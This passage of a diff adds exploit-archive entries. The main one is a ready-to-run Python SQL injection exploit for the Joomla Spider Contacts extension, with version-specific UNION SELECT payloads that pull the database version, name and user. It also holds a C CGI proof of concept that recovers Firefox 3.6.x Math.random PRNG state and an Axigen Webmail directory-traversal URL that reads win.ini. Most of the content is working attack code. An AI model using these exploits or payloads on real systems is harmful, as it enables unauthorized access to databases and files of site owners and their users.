+# 2014-09-10:  Vendor Response/Feedback 
+# 2014-09-10:  Vendor Fix/Patch
+# 2014-09-10:  Public Disclosure
+
+import codecs
+import httplib
+import re
+import sys
+import socket
+import optparse
+
+banner = """
+
+   $$$$$\                                   $$\                  $$$$$$\            $$\       $$\                      
+   \__$$ |                                  $$ |                $$  __$$\           \__|      $$ |                     
+      $$ | $$$$$$\   $$$$$$\  $$$$$$\$$$$\  $$ | $$$$$$\        $$ /  \__| $$$$$$\  $$\  $$$$$$$ | $$$$$$\   $$$$$$\   
+      $$ |$$  __$$\ $$  __$$\ $$  _$$  _$$\ $$ | \____$$\       \$$$$$$\  $$  __$$\ $$ |$$  __$$ |$$  __$$\ $$  __$$\  
+$$\   $$ |$$ /  $$ |$$ /  $$ |$$ / $$ / $$ |$$ | $$$$$$$ |       \____$$\ $$ /  $$ |$$ |$$ /  $$ |$$$$$$$$ |$$ |  \__| 
+$$ |  $$ |$$ |  $$ |$$ |  $$ |$$ | $$ | $$ |$$ |$$  __$$ |      $$\   $$ |$$ |  $$ |$$ |$$ |  $$ |$$   ____|$$ |       
+\$$$$$$  |\$$$$$$  |\$$$$$$  |$$ | $$ | $$ |$$ |\$$$$$$$ |      \$$$$$$  |$$$$$$$  |$$ |\$$$$$$$ |\$$$$$$$\ $$ |       
+ \______/  \______/  \______/ \__| \__| \__|\__| \_______|       \______/ $$  ____/ \__| \_______| \_______|\__|       
+                                                                          $$ |                                         
+                                                                          $$ |                                         
+                                                                          \__|                                         
+ $$$$$$\                       $$\                           $$\                       $$\       $$$$$$\      $$$$$$\  
+$$  __$$\                      $$ |                          $$ |                    $$$$ |     $$ ___$$\    $$  __$$\ 
+$$ /  \__| $$$$$$\  $$$$$$$\ $$$$$$\    $$$$$$\   $$$$$$$\ $$$$$$\    $$$$$$$\       \_$$ |     \_/   $$ |   $$ /  \__|
+$$ |      $$  __$$\ $$  __$$\\_$$  _|   \____$$\ $$  _____|\_$$  _|  $$  _____|        $$ |       $$$$$ /    $$$$$$$\  
+$$ |      $$ /  $$ |$$ |  $$ | $$ |     $$$$$$$ |$$ /        $$ |    \$$$$$$\          $$ |       \___$$\    $$  __$$\ 
+$$ |  $$\ $$ |  $$ |$$ |  $$ | $$ |$$\ $$  __$$ |$$ |        $$ |$$\  \____$$\         $$ |     $$\   $$ |   $$ /  $$ |
+\$$$$$$  |\$$$$$$  |$$ |  $$ | \$$$$  |\$$$$$$$ |\$$$$$$$\   \$$$$  |$$$$$$$  |      $$$$$$\ $$\\$$$$$$  |$$\ $$$$$$  |
+ \______/  \______/ \__|  \__|  \____/  \_______| \_______|   \____/ \_______/       \______|\__|\______/ \__|\______/ 
+                                                                                                                       
+                                                                                         j00ml4 Spid3r C0nt4cts <= 1.3.6 SQLi
+
+                                		     Written by:
+
+                              	                   Claudio Viviani
+
+                           		        http://www.homelab.it
+
+                                                   info@homelab.it
+		                               homelabit@protonmail.ch
+
+                      			  https://www.facebook.com/homelabit
+                      			    https://twitter.com/homelabit
+                      	                 https://plus.google.com/+HomelabIt1/
+                               https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
+
+"""
+
+C0mm4nds = dict()
+C0mm4nds['DB VERS'] = 'VERSION'
+C0mm4nds['DB NAME'] = 'DATABASE'
+C0mm4nds['DB USER'] = 'CURRENT_USER'
+
+def def_payload(payl):
+    payl = payl
+    return payl
+
+
+def com_com_spidercalendar():
+    com_spidercalendar = "index.php?option=com_spidercontacts&contact_id="+payload+"&view=showcontact&lang=ca"
+    return com_spidercalendar
+
+
+ver_spidercontacts = "administrator/components/com_spidercontacts/spidercontacts.xml"
+
+vuln = 0
+
+def cmdMySQL(cmd):
+   SqlInjList = [
+   # SQLi Spider Contacts 1.3.6
+'1%20UNION%20ALL%20SELECT%20CONCAT%280x68306d336c34623174%2CIFNULL%28CAST%28'+cmd+'%28%29%20AS%20CHAR%29%2C0x20%29%2C0x743162346c336d3068%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23',
+   # SQLi Spider Contacts 1.3.5 - 1.3.4
+'1%20UNION%20ALL%20SELECT%20CONCAT%280x68306d336c34623174%2CIFNULL%28CAST%28'+cmd+'%28%29%20AS%20CHAR%29%2C0x20%29%2C0x743162346c336d3068%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23',
+   # SQLi Spider Contacts 1.3.3
+'1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CCONCAT%280x68306d336c34623174%2CIFNULL%28CAST%28'+cmd+'%28%29%20AS%20CHAR%29%2C0x20%29%2C0x743162346c336d3068%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23',
+   # SQLi Spider Contacts 1.3
+'1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CCONCAT%280x68306d336c34623174%2CIFNULL%28CAST%28'+cmd+'%28%29%20AS%20CHAR%29%2C0x20%29%2C0x743162346c336d3068%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23',
+   # SQLi Spider Contacts 1.2 - 1.1 - 1.0
+'-9900%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CCONCAT%280x68306d336c34623174%2CIFNULL%28CAST%28'+cmd+'%28%29%20AS%20CHAR%29%2C0x20%29%2C0x743162346c336d3068%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23',
+   ]
+   return SqlInjList
+
+def checkProtocol(pr):
+
+    parsedHost = ""
+    PORT =  m_oOptions.port
+
+    if pr[0:8] == "https://":
+        parsedHost = pr[8:]
+
+        if parsedHost.endswith("/"):
+            parsedHost = parsedHost.replace("/","")
+            if PORT == 0:
+                PORT = 443
+
+        PROTO = httplib.HTTPSConnection(parsedHost, PORT)
+
+    elif pr[0:7] == "http://":
+        parsedHost = pr[7:]
+        if parsedHost.endswith("/"):
+            parsedHost = parsedHost.replace("/","")
+        if PORT == 0:
+            PORT = 80
+
+        PROTO = httplib.HTTPConnection(parsedHost, PORT)
+
+    else:
+        parsedHost = pr
+
+        if parsedHost.endswith("/"):
+            parsedHost = parsedHost.replace("/","")
+        if PORT == 0:
+            PORT = 80
+
+        PROTO = httplib.HTTPConnection(parsedHost, PORT)
+
+    return PROTO, parsedHost
+
+def connection(addr, url_string):
+
+    parsedHost = checkProtocol(addr)[1]
+    PROTO =  checkProtocol(addr)[0]
+    try:
+        socket.gethostbyname(parsedHost)
+
+    except socket.gaierror:
+        print 'Hostname could not be resolved. Exiting'
+        sys.exit()
+
+    connection_req =  checkProtocol(addr)[0]
+
+    try:
+        connection_req.request('GET', url_string)
+    except socket.error:
+        print('Connection Error')
+        sys.exit(1)
+
+    response = connection_req.getresponse()
+    reader = codecs.getreader("utf-8")(response)
+
+    return {'response':response, 'reader':reader}
+
+
+if __name__ == '__main__':
+    m_oOpts = optparse.OptionParser("%prog -H http[s]://Host_or_IP [-b, --base base_dir] [-p, --port PORT]")
+    m_oOpts.add_option('--host', '-H', action='store', type='string',
+        help='The address of the host running Spider Contacts extension(required)')
+    m_oOpts.add_option('--base', '-b', action='store', type='string', default="/",
+	help='base dir joomla installation, default "/")')
+    m_oOpts.add_option('--port', '-p', action='store', type='int', default=0,
+        help='The port on which the daemon is running (default 80)')
+
+    m_oOptions, remainder = m_oOpts.parse_args()
+    m_nHost = m_oOptions.host
+    m_nPort = m_oOptions.port
+    m_nBase = m_oOptions.base
+
+    if not m_nHost:
+        print(banner)       
+        print m_oOpts.format_help()
+        sys.exit(1)
+
+    print(banner)
+
+    if m_nBase != "/":
+	if m_nBase[0] == "/":
+		m_nBase = m_nBase[1:]
+		if m_nBase[-1] == "/":
+			m_nBase = m_nBase[:-1]
+	else:
+		if m_nBase[-1] == "/":
+			m_nBase = m_nBase[:-1]
+	m_nBase = '/'+m_nBase+'/'
+
+    payload = def_payload('1%27')
+    com_spidercalendar = com_com_spidercalendar()
+    # Start connection to host for Joomla Spider Contacts vulnerability
+    response = connection(m_nHost, m_nBase+com_spidercalendar).values()[0]
+    reader = connection(m_nHost, m_nBase+com_spidercalendar).values()[1]
+    # Read connection code number
+    getcode = response.status
+
+    print("[+] Searching for Joomla Spider Contacts vulnerability...")
+    print("[+]")
+    
+    if getcode != 404:
+        for lines in reader:
+            if not lines.find("spidercontacts_contacts.id") == -1:
+		print("[!] Boolean SQL injection vulnerability FOUND!")
+                print("[+]")
+                print("[+] Detection version in progress....")
+		print("[+]")
+	
+                try:
+                    response = connection(m_nHost, m_nBase+ver_spidercontacts).values()[0]
+                    reader = connection(m_nHost, m_nBase+ver_spidercontacts).values()[1]
+                    getcode = response.status
+                    if getcode != 404:
+                        for line_version in reader:
+                           if not line_version.find("<version>") == -1:
+                               VER = re.compile('>(.*?)<').search(line_version).group(1)
+                               VER_REP = VER.replace(".","")
+                               if int(VER_REP) > 136 or int(VER_REP[0]) == 2:
+                                   print("[X] VERSION: "+VER)
+                                   print("[X] Joomla Spider Contacts => 1.3.7 are not vulnerables")
+                                   sys.exit(1)
+                               elif int(VER_REP) == 136:
+                                   print("[+] EXTENSION VERSION: "+VER)
+                                   print("[+]")
+                                   for  cmddesc, cmdsqli in C0mm4nds.items():
+                                       try:
+                                           paysql = cmdMySQL(cmdsqli)[0]
+                                           payload = def_payload(paysql)
+                                           com_spidercalendar = com_com_spidercalendar()
+                                           response = connection(m_nHost, m_nBase+com_spidercalendar).values()[0]
+                                           reader = connection(m_nHost, m_nBase+com_spidercalendar).values()[1]
+                                           getcode = response.status
+                                           if getcode != 404:
+                                              for line_response in reader:
+                                                  if not line_response.find("h0m3l4b1t") == -1:
+                                                      MYSQL_VER = re.compile('h0m3l4b1t(.*?)t1b4l3m0h').search(line_response).group(1)
+                                                      if vuln == 0:
+                                                          print("[!] "+m_nHost+" VULNERABLE!!!")
+                                                          print("[+]")
+                                                      print("[!] "+cmddesc+" : "+MYSQL_VER)
+                                                      vuln = 1
+                                                      break
+                                       except socket.error:
+                                           print('[X] Connection was lost please retry')
+                                           sys.exit(1)
+                               elif int(VER_REP) == 135 or int(VER_REP) == 134:
+                                   print("[+] EXTENSION VERSION: "+VER)
+                                   print("[+]")
+                                   for  cmddesc, cmdsqli in C0mm4nds.items():
+                                       try:
+                                           paysql = cmdMySQL(cmdsqli)[1]
+                                           payload = def_payload(paysql)
+                                           com_spidercalendar = com_com_spidercalendar()
+                                           response = connection(m_nHost, m_nBase+com_spidercalendar).values()[0]
+                                           reader = connection(m_nHost, m_nBase+com_spidercalendar).values()[1]
+                                           getcode = response.status
+                                           if getcode != 404:
+                                              for line_response in reader:
+                                                  if not line_response.find("h0m3l4b1t") == -1:
+                                                      MYSQL_VER = re.compile('h0m3l4b1t(.*?)t1b4l3m0h').search(line_response).group(1)
+                                                      if vuln == 0:
+                                                          print("[!] "+m_nHost+" VULNERABLE!!!")
+                                                          print("[+]")
+                                                      print("[!] "+cmddesc+" : "+MYSQL_VER)
+                                                      vuln = 1
+                                                      break
+                                       except socket.error:
+                                           print('[X] Connection was lost please retry')
+                                           sys.exit(1)
+                               elif int(VER_REP) == 133:
+                                   print("[+] EXTENSION VERSION: "+VER)
+                                   print("[+]")
+                                   for  cmddesc, cmdsqli in C0mm4nds.items():
+                                       try:
+                                           paysql = cmdMySQL(cmdsqli)[2]
+                                           payload = def_payload(paysql)
+                                           com_spidercalendar = com_com_spidercalendar()
+                                           response = connection(m_nHost, m_nBase+com_spidercalendar).values()[0]
+                                           reader = connection(m_nHost, m_nBase+com_spidercalendar).values()[1]
+                                           getcode = response.status
+                                           if getcode != 404:
+                                              for line_response in reader:
+                                                  if not line_response.find("h0m3l4b1t") == -1:
+                                                      MYSQL_VER = re.compile('h0m3l4b1t(.*?)t1b4l3m0h').search(line_response).group(1)
+                                                      if vuln == 0:
+                                                          print("[!] "+m_nHost+" VULNERABLE!!!")
+                                                          print("[+]")
+                                                      print("[!] "+cmddesc+" : "+MYSQL_VER)
+                                                      vuln = 1
+                                                      break
+                                       except socket.error:
+                                           print('[X] Connection was lost please retry')
+                                           sys.exit(1)
+                               elif int(VER_REP) == 13:
+                                   print("[+] EXTENSION VERSION: "+VER)
+                                   print("[+]")
+                                   for  cmddesc, cmdsqli in C0mm4nds.items():
+                                       try:
+                                           paysql = cmdMySQL(cmdsqli)[3]
+                                           payload = def_payload(paysql)
+                                           com_spidercalendar = com_com_spidercalendar()
+                                           response = connection(m_nHost, m_nBase+com_spidercalendar).values()[0]
+                                           reader = connection(m_nHost, m_nBase+com_spidercalendar).values()[1]
+                                           getcode = response.status
+                                           if getcode != 404:
+                                              for line_response in reader:
+                                                  if not line_response.find("h0m3l4b1t") == -1:
+                                                      MYSQL_VER = re.compile('h0m3l4b1t(.*?)t1b4l3m0h').search(line_response).group(1)
+                                                      if vuln == 0:
+                                                          print("[!] "+m_nHost+" VULNERABLE!!!")
+                                                          print("[+]")
+                                                      print("[!] "+cmddesc+" : "+MYSQL_VER)
+                                                      vuln = 1
+                                                      break
+                                       except socket.error:
+                                           print('[X] Connection was lost please retry')
+                                           sys.exit(1)
+                               elif int(VER_REP[:2]) == 10 or int(VER_REP[:2]) == 11 or int(VER_REP[:2]) == 12:
+                                   print("[+] EXTENSION VERSION: "+VER)
+                                   print("[+]")
+                                   for  cmddesc, cmdsqli in C0mm4nds.items():
+                                       try:
+                                           paysql = cmdMySQL(cmdsqli)[4]
+                                           payload = def_payload(paysql)
+                                           com_spidercalendar = com_com_spidercalendar()
+                                           response = connection(m_nHost, m_nBase+com_spidercalendar).values()[0]
+                                           reader = connection(m_nHost, m_nBase+com_spidercalendar).values()[1]
+                                           getcode = response.status
+                                           if getcode != 404:
+                                              for line_response in reader:
+                                                  if not line_response.find("h0m3l4b1t") == -1:
+                                                      MYSQL_VER = re.compile('h0m3l4b1t(.*?)t1b4l3m0h').search(line_response).group(1)
+                                                      if vuln == 0:
+                                                          print("[!] "+m_nHost+" VULNERABLE!!!")
+                                                          print("[+]")
+                                                      print("[!] "+cmddesc+" : "+MYSQL_VER)
+                                                      vuln = 1
+                                                      break
+                                       except socket.error:
+                                           print('[X] Connection was lost please retry')
+                                           sys.exit(1)
+                               else:
+                                   print("[-] EXTENSION VERSION: Unknown :(")
+                                   sys.exit(0)
+                        if int(vuln) == 0:
+                            # VERSION NOT VULNERABLE :(
+                            print("[X] Spider Contacts patched or SQLi blocked by Web Application Firewall")
+                            sys.exit(1)
+                        else:
+                            sys.exit(0)
+                except socket.error:
+                    print('[X] Connection was lost please retry')
+                    sys.exit(1)
+	# NO SQL BLIND DETECTED
+	print("[X] Spider Contacts patched or SQLi blocked by Web Application Firewall")
+	sys.exit(1)
+    else:
+        print('[X] URL "'+m_nHost+m_nBase+com_spidercalendar+'" NOT FOUND')
+        sys.exit(1)
diff --git a/platforms/unix/remote/34621.c b/platforms/unix/remote/34621.c
new file mode 100755
index 000000000..3253c783e
--- /dev/null
+++ b/platforms/unix/remote/34621.c
@@ -0,0 +1,109 @@
+source: http://www.securityfocus.com/bid/43222/info
+
+Mozilla Firefox is prone to a cross-domain information-disclosure vulnerability.
+
+An attacker can exploit this issue by tricking an unsuspecting victim into viewing a page containing malicious content.
+
+Successful exploits will allow attackers to bypass the same-origin policy and obtain potentially sensitive information; other attacks are possible. 
+
+#include <stdlib.h>
+#include <stdio.h>
+#include <string.h>
+typedef unsigned long long int uint64;
+typedef unsigned int uint32;
+#define UINT64(x) (x##ULL)
+#define a UINT64(0x5DEECE66D)
+#define b UINT64(0xB)
+uint64 adv(uint64 x)
+{
+      return (a*x+b) & ((UINT64(1)<<48)-1);
+}
+unsigned int  calc(double sample,uint64* state)
+{
+      int v;
+      uint64  sample_int=sample*((double)(UINT64(1)<<53));
+      uint32  x1=sample_int>>27;
+      uint32  x2=sample_int & ((1<<27)-1);
+      uint32  out;
+      if ((sample>=1.0) || (sample<0.0))
+      {
+            // Error - bad input
+            return 1;
+      }
+      for (v=0;v<(1<<22);v++)
+      {
+            *state=adv((((uint64)x1)<<22)|v);
+            out=((*state)>>(48-27))&((1<<27)-1);
+            if (out==x2)
+            {
+                   return 0;
+            }
+      }
+      // Could not find PRNG internal state
+      return 2;
+}
+int main(int argc, char* argv[])
+{
+      char body[1000]="";
+char head[]="\
+      <html>\
+      <body>\
+      <script>\
+      document.write('userAgent: '+navigator.userAgent);\
+      </script>\
+      <br>\
+      ";
+char tail[]="\
+      <form method='GET' onSubmit='f()'>\
+      <input type='hidden' name='r'>\
+      <input id='x' type='submit' name='dummy'\
+            value='Calculate Firefox 3.6.4-3.6.8 PRNG state'>\
+      </form>\
+      <script>\
+      function f()\
+      {\
+            document.forms[0].r.value=Math.random();\
+      }\
+      </script>\
+      </body>\
+      </html>\
+      ";
+char tail2[]="\
+      </body>\
+      </html>\
+      ";
+double r;
+char msg[1000];
+int rc;
+uint64 state;
+strcat(body,head);
+if (strstr(getenv("QUERY_STRING"),"r=")!=NULL)
+{
+      sscanf(getenv("QUERY_STRING"),"r=%lf",&r);
+      rc=calc(r,&state);
+      if (rc==0)
+      {
+            sprintf(msg,"PRNG state (hex): %012llx\n",state);
+            strcat(body,msg);
+      }
+      else
+      {
+            sprintf(msg,"Error in calc(): %d\n",rc);
+            strcat(body,msg);
+      }
+      strcat(body,tail2);
+}
+else
+{
+      strcat(body,tail);
+}
+printf("Content-Type: text/html\r\n");
+printf("Content-Length: %d\r\n",strlen(body));
+  printf("Cache-Control: no-cache\r\n");
+  printf("\r\n");
+  printf("%s",body);
+  return;
+}
+
+
+
diff --git a/platforms/windows/remote/34622.txt b/platforms/windows/remote/34622.txt
new file mode 100755
index 000000000..03377ffca
--- /dev/null
+++ b/platforms/windows/remote/34622.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/43230/info
+
+Axigen Webmail is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input.
+
+Exploiting this issue may allow an attacker to obtain sensitive information that could aid in further attacks.
+
+Axigen Webmail 7.4.1 is vulnerable; other versions may be affected. 
+
+http://www.example.com/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows/win.ini 
\ No newline at end of file